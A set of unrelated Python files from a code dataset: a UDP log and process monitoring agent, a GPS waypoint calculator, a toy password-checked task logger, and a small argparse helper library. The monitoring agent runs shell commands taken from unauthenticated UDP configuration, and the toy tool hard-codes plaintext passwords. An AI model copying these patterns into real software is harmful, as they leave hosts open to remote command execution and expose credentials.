# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
import sys
import os
import time
import re
import select
import string
import subprocess
import logging
import logging.handlers
from socket import *
# Globals:
# Shared state for the agent: lists of log files to check, processes to
# monitor, the queue of updates to send to the server, etc.
file_consumer_list = []               # active file_consumer instances (one per file rule)
host_name = os.uname()[1]             # this host's name, reported with every alert
ps_command = []                       # command used to list processes (from config)
process_list = []                     # process-watch rules parsed from the configuration
uid_seed = 0                          # per-run counter used to build unique alert ids
alert_queue = []                      # pending alerts: [uid, text, next_send, created]
cmd_list = []                         # "run:" command rules parsed from the configuration
logger = logging.getLogger(__name__)
def is_active(active_string):
    """Return True when the current local time is inside one of the windows
    in ``active_string`` (format: "day_numbers;HH:MM-HH:MM,..." where day
    numbers follow time.localtime, 0 = Monday), or when the string is
    empty, which means "always active".
    """
    if not active_string:
        return True
    now = time.localtime()
    minute_of_day = (now[3] * 60) + now[4]
    today = str(now[6])
    for window in active_string.split(','):
        parsed = re.match('^([0-9]+);(\d+):(\d+)\-(\d+):(\d+)$', window)
        if parsed is None:
            continue  # malformed window specs are ignored
        start = (int(parsed.group(2)) * 60) + int(parsed.group(3))
        end = (int(parsed.group(4)) * 60) + int(parsed.group(5))
        if start <= minute_of_day <= end and today in parsed.group(1):
            return True
    return False
# An instance of file_consumer is created for each file
# tracking configuration.
class file_consumer:
    """Tails one log file against one monitoring rule.

    Lines are matched against the configured regex patterns and turned
    into alert strings of the form "tags%%filename%%payload".
    """

    def __init__(self, filename, matches, actions, exceeds):
        """Set up the tracker.

        filename -- path of the log file to tail
        matches  -- list of regex patterns to look for
        actions  -- rule options: 'tags' (required) plus optional
                    'message', 'period', 'threshold', 'metric', 'active'
        exceeds  -- unused (always passed as ''); kept for compatibility
        """
        global logger
        self.open = False        # whether the file is currently open
        self.filename = filename
        self.seek = 2            # 2 == os.SEEK_END on first open, 0 afterwards
        self.matches = matches
        self.tags = actions['tags']
        self.message = ''
        self.active = ''
        logger.info('Creating file consumer for file '+filename+' (patterns: '+str(matches)+', '+str(actions)+')')
        if('message' in actions):
            self.message = actions['message']
        self.period = 0
        if('period' in actions):
            self.period = int(actions['period'])
        self.threshold = 0
        if('threshold' in actions):
            self.threshold = int(actions['threshold'])
        self.count = 0           # matches seen in the current period
        self.next_report = time.time() + self.period
        self.metric = 0
        if('metric' in actions):
            self.metric = int(actions['metric'])
        if('active' in actions):
            self.active = actions['active']

    # Logs when a file consumer is closed down - this happens when
    # an aa436.py Agent receives a Reset command from the ax436.py Server.
    # NOTE(review): if the file was never opened, self.fd does not exist
    # and this raises AttributeError -- confirm whether that matters here.
    def __del__(self):
        self.fd.close()
        logger.info('Removing file consumer for file '+self.filename)

    # Checks to see if any of the "periodic" file events
    # need to be raised. Examples of periodic events for files are:
    # - A count of the number of matches of a set of strings within a time period.
    # - An event raised if no instances of a specified string have appeared in a
    #   log file within a time period.
    def check_period(self):
        # Appends to self.list, so it must be called from do_read() after
        # self.list has been initialised.
        if(self.period > 0):
            if(time.time() > self.next_report):
                # Alert if matches exceed the threshold.
                if(self.threshold > 0 and self.count > self.threshold and len(self.message) > 0):
                    self.list = self.list + [ self.tags + '%%' + self.filename + '%%' + self.message ]
                # Alert if no matches within n seconds.
                elif(self.count == 0 and len(self.message) > 0 and self.threshold == 0):
                    self.list = self.list + [ self.tags + '%%' + self.filename + '%%' + self.message ]
                # Output the count of matches every n seconds.
                elif(len(self.message) == 0):
                    self.list = self.list + [ self.tags + '%%' + self.filename + '%%' + str(self.count) ]
                self.next_report = time.time() + self.period
                self.count = 0

    # The main program calls read() for each file tracker. Returns
    # a list of events from the do_read() function if within an active
    # time, otherwise returns an empty list.
    def read(self):
        if(is_active(self.active) == True):
            return(self.do_read())
        else:
            return([])

    # This function does the actual file reading. Logic to deal with
    # log files "rolling" is contained here.
    def do_read(self):
        global logger
        self.list = []
        self.check_period()
        self.finished = False
        while(self.finished == False):
            if(self.open == False):
                # (Re-)open the file; the very first open seeks to the end
                # so only new lines are reported.
                try:
                    self.st = os.stat(self.filename)
                    self.inode = self.st.st_ino
                    self.fd = open(self.filename)
                    self.fd.seek(0, self.seek)
                    self.open = True
                    self.seek = 0
                except Exception:
                    logger.error('Error: File '+self.filename+' not found')
                    self.finished = True
            else:
                self.cp = self.fd.tell()
                self.nextline = self.fd.readline()
                if not self.nextline:
                    # End of file: if the inode changed, the file rolled --
                    # close and reopen from the start on the next pass.
                    try:
                        self.st = os.stat(self.filename)
                        if(self.st.st_ino != self.inode):
                            self.fd.close()
                            self.open = False
                        else:
                            self.fd.seek(self.cp)
                            self.finished = True
                    except Exception:
                        logger.error('Error: File '+self.filename+' not found')
                        self.finished = True
                else:
                    for m in self.matches:
                        if(re.search(m,self.nextline) is not None):
                            if(self.period > 0):
                                self.count += 1
                            elif(len(self.message) > 0):
                                # Alert every match with a pre-defined message.
                                self.list = self.list + [ self.tags + '%%' + self.filename + '%%' + self.message ]
                            else:
                                # Alert every match with the actual line matched.
                                self.list = self.list + [ self.tags + '%%' + self.filename + '%%' + self.nextline.strip() ]
        return(self.list)
# This function is called when an aa436.py Agent first receives configuration
# from an ax436.py Server.
def do_config(conf):
    """Parse a "%%"-separated configuration string into the global rule
    lists: file_consumer_list, ps_command, process_list and cmd_list.

    Each element is "keyword: argument"; "file:"/"match:"/"active:"/
    "process:" accumulate state that the following "alert_*:" keyword
    consumes.
    """
    global file_consumer_list
    global ps_command
    global process_list
    global cmd_list
    global logger
    c_file = ''
    c_match = []
    c_active = ''
    c_process = ''
    logger.info('Configuration received from server')
    for cl in conf.split('%%'):
        m = re.match('^([a-z_:]+)\s+(.+)\s*$', cl)
        if m:
            cmd = m.group(1)
            arg = m.group(2)
            if(cmd == 'file:'):
                c_file = arg
            elif(cmd == 'match:'):
                c_match += [ arg ]
            elif(cmd == 'active:'):
                c_active = arg
            # Alert on every matching line (with a fixed message, or the
            # matched line itself when no message is given).
            elif(cmd == 'alert_all:' and len(c_match) > 0 and len(c_file) > 0):
                am = re.match('^tags=(\S+)\s+message=(.+)\s*$', arg)
                if am:
                    file_consumer_list += [ file_consumer(c_file, c_match, { 'tags': am.group(1), 'message': am.group(2), 'active': c_active }, '') ]
                else:
                    am2 = re.match('^tags=(\S+)\s*$', arg)
                    if am2:
                        file_consumer_list += [ file_consumer(c_file, c_match, { 'tags': am2.group(1), 'active': c_active }, '') ]
                c_file = ''
                c_match = []
                c_active = ''
            # Alert when more than `threshold` matches occur in `seconds`.
            elif(cmd == 'alert_n:' and len(c_match) > 0 and len(c_file) > 0):
                am = re.match('^tags=(\S+)\s+threshold=(\d+)\s+seconds=(\d+)\s+message=(.+)\s*$', arg)
                if am:
                    file_consumer_list += [ file_consumer(c_file, c_match, { 'tags': am.group(1), 'threshold': am.group(2), 'period': am.group(3), 'message': am.group(4), 'active': c_active }, '') ]
                c_file = ''
                c_match = []
                c_active = ''
            # Publish a match count every `seconds`.
            elif(cmd == 'alert_count:' and len(c_match) > 0 and len(c_file) > 0):
                am = re.match('^tags=(\S+)\s+seconds=(\d+)\s*$', arg)
                if am:
                    file_consumer_list += [ file_consumer(c_file, c_match, { 'tags': am.group(1), 'period': am.group(2), 'metric': '1', 'active': c_active }, '') ]
                c_file = ''
                c_match = []
                c_active = ''
            # Alert when no match appears within `seconds`.
            elif(cmd == 'alert_inactive:' and len(c_match) > 0 and len(c_file) > 0):
                am = re.match('^tags=(\S+)\s+seconds=(\d+)\s+message=(.+)\s*$', arg)
                if am:
                    file_consumer_list += [ file_consumer(c_file, c_match, { 'tags': am.group(1), 'period': am.group(2), 'message': am.group(3), 'metric': '2', 'active': c_active }, '') ]
                c_file = ''
                c_match = []
                c_active = ''
            elif(cmd == 'ps_command:'):
                ps_command = arg.split()
                logger.info('Process check command: '+str(ps_command))
            elif(cmd == 'process:'):
                c_process = arg
            # Alert when the instance count of a process leaves [min, max].
            elif(cmd == 'alert_running:' and len(c_process) > 0):
                pc = re.match('^tags=(\S+)\s+min=(\d+)\s+max=(\d+)\s+message=(.+)\s*$', arg)
                if pc:
                    pc_rec = { 'match': c_process, 'tags': pc.group(1), 'min': int(pc.group(2)), 'max': int(pc.group(3)), 'message': pc.group(4), 'count': 0, 'error': 0, 'active': c_active }
                    process_list += [ pc_rec ]
                    logger.info('Watching process: '+str(pc_rec))
                c_process = ''
                c_active = ''
            # Periodically run a command and extract fields from its output.
            elif(cmd == 'run:'):
                cm = re.match('^command=(.+)\s+extract=(.+)\s*$', arg)
                if cm:
                    new_cmd_list = { 'command': cm.group(1).strip().split(), 'extract': cm.group(2).strip(), 'alerts': [] }
                    logger.info('Running command: '+str(new_cmd_list))
                    cmd_list.append(new_cmd_list)
            # Threshold alerts attached to the most recent "run:" rule.
            elif(cmd == 'alert_if:'):
                cm = re.match('^tags=(\S+)\s+match=(\d+),(\S+)\s+upper_limit=(\d+),([0-9\.]+)\s+message=(.+)\s*$', arg)
                if cm:
                    new_cmd_alist = { 'tags': cm.group(1), 'match_n': int(cm.group(2)), 'match_str': cm.group(3), 'upper_limit_n': int(cm.group(4)), 'upper_limit_v': float(cm.group(5)), 'message': cm.group(6), 'active': c_active }
                    logger.info('Alerting on command output: '+str(new_cmd_alist))
                    cmd_list[len(cmd_list)-1]['alerts'].append(new_cmd_alist)
                    c_active = ''
                cm = re.match('^tags=(\S+)\s+match=(\d+),(\S+)\s+lower_limit=(\d+),([0-9\.]+)\s+message=(.+)\s*$', arg)
                if cm:
                    new_cmd_alist = { 'tags': cm.group(1), 'match_n': int(cm.group(2)), 'match_str': cm.group(3), 'lower_limit_n': int(cm.group(4)), 'lower_limit_v': float(cm.group(5)), 'message': cm.group(6), 'active': c_active }
                    logger.info('Alerting on command output: '+str(new_cmd_alist))
                    cmd_list[len(cmd_list)-1]['alerts'].append(new_cmd_alist)
                    c_active = ''
            # Metric publication attached to the most recent "run:" rule.
            elif(cmd == 'alert_metric:'):
                cm = re.match('^tags=(\S+)\s+match=(\d+),(\S+)\s+metric=(\d+)\s*$', arg)
                if cm:
                    new_cmd_alist = { 'tags': cm.group(1), 'match_n': int(cm.group(2)), 'match_str': cm.group(3), 'metric': int(cm.group(4)), 'active': c_active }
                    logger.info('Publishing on command output: '+str(new_cmd_alist))
                    cmd_list[len(cmd_list)-1]['alerts'].append(new_cmd_alist)
                    c_active = ''
def do_unconfig():
    """Erase all current configuration.

    Called when the aa436.py Agent receives a Reset command from the
    ax436.py Server; the agent will then re-request a fresh configuration.
    """
    global file_consumer_list
    global ps_command
    global process_list
    global cmd_list
    logger.info('Unconfiguring')
    file_consumer_list, ps_command, process_list, cmd_list = [], [], [], []
def queue_alert(alert):
    """Add a new alert to the outgoing queue (bounded at 256 entries).

    Each entry is [uid, text, next_send_time, created_time].  Alerts are
    sent to the ax436.py Server one by one; each must be acknowledged
    before the next is sent.
    """
    global uid_seed
    global alert_queue
    if len(alert_queue) >= 256:
        logger.info(time.ctime()+' Alert not queued (queue full): '+alert)
        return
    logger.info(time.ctime()+' Queueing: '+alert)
    uid = '{0}_{1}'.format(int(time.time()), uid_seed)
    uid_seed += 1
    alert_queue.append([uid, alert, 0, int(time.time())])
# This is the main program loop. UDP sockets are initialised and then
# a loop is entered which invokes log file checks, process checks etc.
# as well as receiving commands from the ax436.py Server.
def main(port):
    """Run the agent: listen on UDP `port` for server commands (SRVHB,
    CONFIG, RESET, ACK) and reply/send alerts to the server on port+1."""
    global process_list
    global alert_queue
    global logger
    global host_name
    global cmd_list
    logger.setLevel(logging.DEBUG)
    logger.addHandler(logging.handlers.RotatingFileHandler('aa436.log', maxBytes = 1000000, backupCount = 4))
    logger.info(time.ctime())
    logger.info('Listening on port '+str(port))
    logger.info('Server on port '+str(port + 1))
    server_name = ''            # host of the currently selected server
    server_seen = 0             # time of the server's last heartbeat
    server_seen_timeout = 30    # seconds of silence before deselecting it
    configured = False
    last_config_req = 0
    last_update = time.time()
    idle_time = 67              # seconds before an "Idle" heartbeat is queued
    alert_queue = []
    process_check_interval = 20
    next_process_check = int(time.time()) + process_check_interval
    stats_check_interval = 60
    next_stats_check = int(time.time()) + stats_check_interval
    last_process_event = 0
    addr = ('', port)
    ad_sock = socket(AF_INET, SOCK_DGRAM)
    ad_sock.bind(addr)
    inputs = [ ad_sock ]
    outputs = []
    while(True):
        # Wait up to one second for a UDP datagram from the server.
        readable, writable, exceptional = select.select(inputs, outputs, inputs, 1.0)
        for rs in readable:
            udp_data = rs.recv(65536)
            m = re.match('^([A-Z]+)%%(.+)', udp_data.decode())
            if m:
                cmd = m.group(1)
                arg = m.group(2)
                # SRVHB: server heartbeat; the first server seen is selected.
                if(cmd == 'SRVHB'):
                    if(arg == server_name):
                        server_seen = time.time()
                    if(len(server_name) == 0):
                        server_name = arg
                        logger.info('Selected server: '+arg)
                elif(cmd == 'CONFIG'):
                    do_config(arg)
                    configured = True
                elif(cmd == 'RESET'):
                    if(arg == host_name):
                        do_unconfig()
                        last_config_req = time.time() + 10
                        configured = False
                # ACK: server acknowledged the head-of-queue alert.
                # NOTE(review): an ACK with an empty queue would raise
                # IndexError -- confirm the server never sends one unsolicited.
                elif(cmd == 'ACK'):
                    if(arg == alert_queue[0][0]):
                        del alert_queue[0]
        # Drop a server that has gone quiet.
        if(server_seen > 0 and time.time() > (server_seen + server_seen_timeout)):
            logger.info('Deselected server: '+server_name)
            server_name = ''
            server_seen = 0
        # Ask (and re-ask every 10s) for configuration until one arrives.
        if(configured == False and len(server_name) > 0 and time.time() > (last_config_req + 10)):
            last_config_req = time.time()
            logger.info('Requesting configuration from '+server_name+' on port '+str(port+1))
            ad_sock.sendto(('CONFREQ%%'+os.uname()[1]).encode(), (server_name, port+1))
            last_update = time.time()
        # Heartbeat when nothing has been sent for a while.
        if(server_seen > 0 and time.time() > (last_update + idle_time) and len(alert_queue) < 3):
            queue_alert('SYSTEM%%NULL%%Idle')
            last_update = time.time()
        # Poll every tracked log file for new alerts.
        for fc in file_consumer_list:
            for alert in fc.read():
                queue_alert(alert)
        # Periodic process check: count matches of each watch rule in the
        # process listing and alert when out of the [min, max] band twice
        # in a row.
        if(len(ps_command) > 0 and int(time.time()) > next_process_check):
            ps_output = subprocess.check_output(ps_command)
            for zeroing_idx in range(len(process_list)):
                process_list[zeroing_idx]['count'] = 0
            for ps_line in ps_output.decode().split('\n'):
                for watching_idx in range(len(process_list)):
                    pm = re.search(process_list[watching_idx]['match'], ps_line)
                    if pm:
                        process_list[watching_idx]['count'] += 1
            for checking_idx in range(len(process_list)):
                if(process_list[checking_idx]['count'] < process_list[checking_idx]['min'] or process_list[checking_idx]['count'] > process_list[checking_idx]['max']):
                    process_list[checking_idx]['error'] += 1
                else:
                    process_list[checking_idx]['error'] = 0
                if(process_list[checking_idx]['error'] > 1 and is_active(process_list[checking_idx]['active']) == True):
                    process_alert_msg = process_list[checking_idx]['tags'] + '%%NULL%%' + process_list[checking_idx]['message'] + ' [' + str(process_list[checking_idx]['count']) + ']'
                    queue_alert(process_alert_msg)
                    process_list[checking_idx]['error'] = 0
                    last_process_event = int(time.time())
            next_process_check = int(time.time()) + process_check_interval
        # Periodic "run:" commands: extract fields from each output line
        # and apply the attached upper/lower-limit and metric rules.
        if(time.time() > next_stats_check):
            for run_cmd in cmd_list:
                for cmd_output_line in subprocess.check_output(run_cmd['command']).decode().split('\n'):
                    c_ext = re.search(run_cmd['extract'], cmd_output_line)
                    if c_ext:
                        for run_alist in run_cmd['alerts']:
                            if('upper_limit_n' in run_alist and is_active(run_alist['active'])):
                                if(run_alist['match_str'] == c_ext.group(run_alist['match_n']) and float(c_ext.group(run_alist['upper_limit_n'])) > run_alist['upper_limit_v']):
                                    queue_alert(run_alist['tags']+'%%NULL%%'+run_alist['message'])
                            elif('lower_limit_n' in run_alist and is_active(run_alist['active'])):
                                if(run_alist['match_str'] == c_ext.group(run_alist['match_n']) and float(c_ext.group(run_alist['lower_limit_n'])) < run_alist['lower_limit_v']):
                                    queue_alert(run_alist['tags']+'%%NULL%%'+run_alist['message'])
                            elif('metric' in run_alist and is_active(run_alist['active'])):
                                if(run_alist['match_str'] == c_ext.group(run_alist['match_n'])):
                                    queue_alert(run_alist['tags']+'%%NULL%%'+str(c_ext.group(run_alist['metric'])))
            next_stats_check = int(time.time()) + stats_check_interval
        # All-clear once no process event has fired for two check cycles.
        if(last_process_event > 0 and time.time() > (last_process_event + (process_check_interval * 2) + 30)):
            last_process_event = 0
            queue_alert('SYSTEM%%NULL%%Process check: All clear')
        # Send (and every 10s re-send) the head-of-queue alert until ACKed.
        if(len(alert_queue) > 0):
            if(int(time.time()) > alert_queue[0][2]):
                ad_sock.sendto(('ALERT%%'+host_name+'%%'+alert_queue[0][0]+'%%'+str(alert_queue[0][3])+'%%'+alert_queue[0][1]).encode(), (server_name, port+1))
                alert_queue[0][2] = int(time.time()) + 10
                last_update = time.time()
# Start hook. The only argument an aa436.py Agent takes is the UDP
# port to listen for broadcasts from the ax436.py Server on (replies
# and alerts are sent to the server on port+1; see main()).
if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: aa436.py udp_port')
        exit(1)
    else:
        main(int(sys.argv[1]))
| {
"repo_name": "chrisbristow/project-436",
"path": "aa436.py",
"copies": "1",
"size": "19655",
"license": "bsd-2-clause",
"hash": 2314344826890936000,
"line_mean": 31.9229480737,
"line_max": 220,
"alpha_frac": 0.5937420504,
"autogenerated": false,
"ratio": 3.398167358229599,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9386293020935607,
"avg_score": 0.02112327753879851,
"num_lines": 597
} |
#aaaa
import math
import time
import sys
from gps import Gps
def convert_image_location_to_waypoints( current_location, x_size, y_size, x_loc, y_loc): #altitude in meters
    """Turn a target pixel inside a camera frame into three GPS waypoints.

    The pixel (x_loc, y_loc) in an x_size-by-y_size image is projected
    onto the ground using the camera field of view (GoPro HD Hero optics)
    at the current altitude, then offset from the current GPS position.
    Two additional "follower" points are computed so the three waypoints
    form a triangle.

    current_location -- Gps object (lattitude/longtitude in degrees,
                        altitude in meters)
    x_size, y_size   -- image dimensions in pixels
    x_loc, y_loc     -- target pixel coordinates

    Returns (alpha, side1, side2): the Gps point over the target plus the
    two follower Gps points.

    (The original also assigned an unused local ``speed = 1`` and carried
    commented-out debug prints; both removed.)
    """
    currentLat = current_location.get_lattitude()
    currentLon = current_location.get_longtitude()
    altitude = current_location.get_altitude()
    # Ground footprint of the whole frame, in meters (GoPro HD Hero specs).
    hor_size, ver_size = fov(2.8, 5, 4.28, 5.7, altitude)
    # Pixel offset of the target from the image centre...
    x_median = x_size/2
    y_median = y_size/2
    x_diff = x_loc - x_median
    y_diff = y_loc - y_median
    # ...scaled to a metric offset on the ground.
    hor_diff = realx(x_size, x_diff, hor_size)
    ver_diff = realy(y_size, y_diff, ver_size)
    horFollower1, verFollower1 = follower(hor_diff, ver_diff, altitude, 0)
    horFollower2, verFollower2 = follower(hor_diff, ver_diff, altitude, 1)
    lat1, lon1 = offset(currentLat, currentLon, hor_diff, ver_diff)
    lat2, lon2 = offset(currentLat, currentLon, horFollower1, verFollower1)
    lat3, lon3 = offset(currentLat, currentLon, horFollower2, verFollower2)
    alpha = Gps(lat1, lon1)
    side1 = Gps(lat2, lon2)
    side2 = Gps(lat3, lon3)
    return (alpha, side1, side2)
def realx(x_size,x_diff,hor_size):
    # Scale a horizontal pixel offset (x_diff out of x_size pixels) to
    # meters on the ground, where hor_size is the frame's horizontal
    # ground extent.  NOTE(review): floor division under Python 2 when all
    # arguments are ints -- confirm float inputs are always supplied.
    return (x_diff*hor_size)/x_size
def realy(y_size,y_diff,ver_size):
    # Scale a vertical pixel offset (y_diff out of y_size pixels) to
    # meters on the ground, where ver_size is the frame's vertical ground
    # extent.  NOTE(review): floor division under Python 2 when all
    # arguments are ints -- confirm float inputs are always supplied.
    return (y_diff*ver_size)/y_size
def fov(N, f, h, v, alt):
    """Ground footprint of a downward-pointing camera at altitude ``alt``.

    N    -- focal number (f-stop); not used by the geometry, kept for
            interface compatibility
    f    -- focal distance
    h, v -- horizontal / vertical sensor size (same units as f)
    alt  -- altitude in meters

    Returns (hor, ver): the horizontal and vertical extent in meters of
    the area covered by the frame.

    (The original also computed the aperture diameter ``D = f / N`` but
    never used it; the dead assignment has been removed.)
    """
    h_angle = 2 * math.atan2(h, 2 * f)  # full horizontal view angle
    v_angle = 2 * math.atan2(v, 2 * f)  # full vertical view angle
    hor = math.tan(h_angle) * alt
    ver = math.tan(v_angle) * alt
    return (hor, ver)
def offset(lat, lon, hor_diff, ver_diff):
    """Shift a (lat, lon) position, in degrees, by a metric ground offset.

    hor_diff is applied along latitude and ver_diff along longitude
    (scaled by cos(lat)), using a spherical-earth approximation.
    """
    earth_radius = 6378137  # earth's radius in meters
    new_lat = lat + (hor_diff / earth_radius) * 180 / math.pi
    new_lon = lon + (ver_diff / (earth_radius * math.cos(math.pi * lat / 180)) * (180 / math.pi))
    return (new_lat, new_lon)
def follower(x, y, alt, fnum):
    """Place one follower point relative to the target at (x, y).

    x, y -- target coordinates in meters relative to the current position
    alt  -- altitude in meters, clamped to a 50 m minimum
    fnum -- 0 for the first follower, 1 for the second; the two followers
            are mirrored on either side of the line to the target

    Returns the follower's (x, y) offset in meters.
    """
    if(alt<50):
        alt = 50  # enforce a minimum working altitude
    r, deg = polar(x, y)
    # Triangle geometry: the follower sits alt/4 to the side of, and
    # alt*sqrt(3)/4 short of, the target.
    opp = alt/4.0
    adj = r-alt*math.sqrt(3.0)/4.0
    # BUG FIX: math.atan2 returns radians; the original computed
    # 180.0*atan2(...) without dividing by pi, so theta was not in the
    # degrees that rect()/polar() use (compare polar() below).
    theta = 180.0*math.atan2(adj,opp)/math.pi
    r2d2 = math.sqrt(opp**2 + adj**2)
    if fnum:
        ang = deg + theta
    else:
        ang = deg - theta
    return rect(r2d2, ang)
def rect(r, w):
    """Convert polar coordinates (radius r, angle w in degrees) to
    cartesian (x, y)."""
    radians = math.pi * w / 180.0
    return r * math.cos(radians), r * math.sin(radians)
def polar(x, y):
    """Convert cartesian (x, y) to polar (radius, angle in degrees)."""
    radius = math.hypot(x, y)
    angle = 180.0*math.atan2(y, x)/math.pi
    return radius, angle
if __name__ == "__main__":
    # NOTE(review): convert_image_location_to_waypoints takes FIVE
    # parameters (current_location first) but only four are passed here,
    # so running this module directly raises TypeError -- a Gps
    # current_location argument is missing from this demo call.
    print convert_image_location_to_waypoints(640,480,323,244)
| {
"repo_name": "alpsayin/python-gps",
"path": "waypoint_calculator.py",
"copies": "1",
"size": "2541",
"license": "mit",
"hash": -6527666918374419000,
"line_mean": 27.8863636364,
"line_max": 109,
"alpha_frac": 0.6654860291,
"autogenerated": false,
"ratio": 2.5384615384615383,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8246749976616962,
"avg_score": 0.09143951818891538,
"num_lines": 88
} |
#aaaa
import getpass
import datetime
def tool(n):
    # Prompt for a username and password, checked against the parallel
    # hard-coded lists below; on success open the task log (Python 2 code:
    # raw_input and a print statement).
    # NOTE(review): parameter n is never used; passwords are stored and
    # compared in plain text -- acceptable only for a toy tool.
    namelist = ['osman','mahmut','sarpulas']
    pwlist = ['namso','tumham','salupras']
    username = raw_input('Enter username:\n')
    print "uname: ", username;
    if username in namelist:
        # Same index in pwlist holds the matching password.
        i = namelist.index(username)
        pw = getpass.getpass(prompt='Enter password:\n')
        if pw == pwlist[int(i)]:
            print('password correct')
            openlist(username)
        else:
            print('FAIL')
    else:
        print('NAME NOT FOUND')
def openlist(username):
    # Print every task already recorded in log.txt, then offer to add a
    # new one or quit (Python 2 print statement).
    f=open('log.txt','r')
    try:
        for line in f:
            print line
    finally:
        f.close()
    # NOTE: the local name `input` shadows the builtin for the rest of
    # this function.
    input = raw_input('Write task title if you want to add a new tast. Write \'exit\' to quit\n')
    if input == 'exit':
        print('quitting...')
    else:
        newtask(username,input)
def newtask(username, input):
    """Append a pipe-delimited task entry to log.txt, then redisplay the log.

    NOTE(review): the second parameter is named `input`, shadowing the
    builtin; the name is kept for interface compatibility with callers.
    """
    taskdesc = raw_input('Input task description:\n')
    # BUG FIX: the original called `f.close` without parentheses, so the
    # file was never explicitly closed.  `with` closes it reliably.
    with open('log.txt', 'a') as f:
        f.write('\n' + username + ' | ' + datetime.datetime.__str__(datetime.datetime.now()) + ' | ' + input + ' | ' + taskdesc)
    print('task: \'' + input + '\' added')
    openlist(username)
if __name__ == "__main__":
    import sys  # kept from the original, although unused here
    tool(1)
"repo_name": "sarpulas/idLog",
"path": "aaa.py",
"copies": "1",
"size": "1158",
"license": "mit",
"hash": -5506614869902112000,
"line_mean": 23.6595744681,
"line_max": 114,
"alpha_frac": 0.5898100173,
"autogenerated": false,
"ratio": 3.376093294460641,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9133897088689905,
"avg_score": 0.06640124461414736,
"num_lines": 47
} |
# Aaargh 0.4
# Taken from https://github.com/wbolster/aaargh
# BSD License per setup.py
"""
Aaargh, an astonishingly awesome application argument helper
"""
from argparse import ArgumentParser
# Sentinel distinguishing "decorator used without parentheses" from an
# explicitly passed argument (None could be a legitimate value).
_NO_FUNC = object()

__all__ = ['App', '__version__']

# XXX: Keep version number in sync with setup.py
__version__ = '0.4'
class App(object):
"""
Simple command line application.
Constructor arguments are propagated to :py:class:`ArgumentParser`.
"""
def __init__(self, *args, **kwargs):
self._parser = ArgumentParser(*args, **kwargs)
self._global_args = []
self._subparsers = self._parser.add_subparsers(title="Subcommands")
self._pending_args = []
self._defaults = {}
    def arg(self, *args, **kwargs):
        """Add a global application argument.

        All arguments are passed on to :py:meth:`ArgumentParser.add_argument`.
        """
        # Also remembered so each subparser created later can repeat this
        # argument (allowing it to be given after the subcommand on the CLI).
        self._global_args.append((args, kwargs))
        return self._parser.add_argument(*args, **kwargs)
    def defaults(self, **kwargs):
        """Set global defaults.

        All arguments are passed on to :py:meth:`ArgumentParser.set_defaults`.
        """
        # Applied on the top-level parser only (cf. cmd_defaults for
        # per-subcommand defaults).
        return self._parser.set_defaults(**kwargs)
    def cmd(self, _func=_NO_FUNC, name=None, *args, **kwargs):
        """Decorator to create a command line subcommand for a function.

        By default, the name of the decorated function is used as the
        name of the subcommand, but this can be overridden by specifying the
        `name` argument. Additional arguments are passed to the subcommand's
        :py:class:`ArgumentParser`.
        """
        if _func is not _NO_FUNC:
            # Support for using this decorator without calling it, e.g.
            # @app.cmd <---- note: no parentheses here!
            # def foo(): pass
            return self.cmd()(_func)

        parser_args = args
        parser_kwargs = kwargs

        def wrapper(func):
            # Inner decorator: builds the subparser once the function is known.
            subcommand = name if name is not None else func.__name__
            parser_kwargs.setdefault('help', "")  # improves --help output
            subparser = self._subparsers.add_parser(
                subcommand, *parser_args, **parser_kwargs)

            # Add global arguments to subcommand as well so that they
            # can be given after the subcommand on the CLI.
            for global_args, global_kwargs in self._global_args:
                subparser.add_argument(*global_args, **global_kwargs)

            # Add any pending arguments
            for args, kwargs in self._pending_args:
                subparser.add_argument(*args, **kwargs)
            self._pending_args = []

            # Add any pending default values
            try:
                pending_defaults = self._defaults.pop(None)
            except KeyError:
                pass  # no pending defaults
            else:
                # Re-key the pending defaults from None to the real function.
                self._defaults[func] = pending_defaults

            # Store callback function and return the decorated function
            # unmodified
            subparser.set_defaults(_func=func)
            return func

        return wrapper
    def cmd_arg(self, *args, **kwargs):
        """Decorator to specify a command line argument for a subcommand.

        All arguments are passed on to :py:meth:`ArgumentParser.add_argument`.

        Note: this function must be used in conjunction with .cmd().
        """
        # TODO: perhaps add a 'group' argument to cmd_arg() that
        # translates to add_argument_group
        if len(args) == 1 and callable(args[0]) and not kwargs:
            # Guards against "@app.cmd_arg" used without parentheses.
            raise TypeError("cmd_arg() decorator requires arguments, "
                            "but none were supplied")

        # Remember the passed args, since the command is not yet known
        # when this decorator is called.
        self._pending_args.append((args, kwargs))

        # Return a do-nothing decorator
        return lambda func: func
    def cmd_defaults(self, **kwargs):
        """Decorator to specify defaults for a subcommand.

        This can be useful to override global argument defaults for specific
        subcommands.

        All arguments are passed on to :py:meth:`ArgumentParser.set_defaults`.

        Note: this function must be used in conjunction with .cmd().
        """
        if len(kwargs) == 1 and callable(list(kwargs.values())[0]):
            raise TypeError("defaults() decorator requires arguments, "
                            "but none were supplied")

        # Work-around http://bugs.python.org/issue9351 by storing the
        # defaults outside the ArgumentParser. The special key "None" is
        # used for the pending defaults for a yet-to-be defined command.
        self._defaults[None] = kwargs
        return lambda func: func
def run(self, *args, **kwargs):
"""Run the application.
This method parses the arguments and takes the appropriate actions. If
a valid subcommand was found, it will be executed and its return value
will be returned.
All arguments are passed on to :py:meth:`ArgumentParser.parse_args`.
"""
if self._pending_args:
raise TypeError("cmd_arg() called without matching cmd()")
if None in self._defaults:
raise TypeError("cmd_defaults() called without matching cmd()")
kwargs = vars(self._parser.parse_args(*args, **kwargs))
func = kwargs.pop('_func')
if func in self._defaults:
kwargs.update(self._defaults[func])
return func(**kwargs) | {
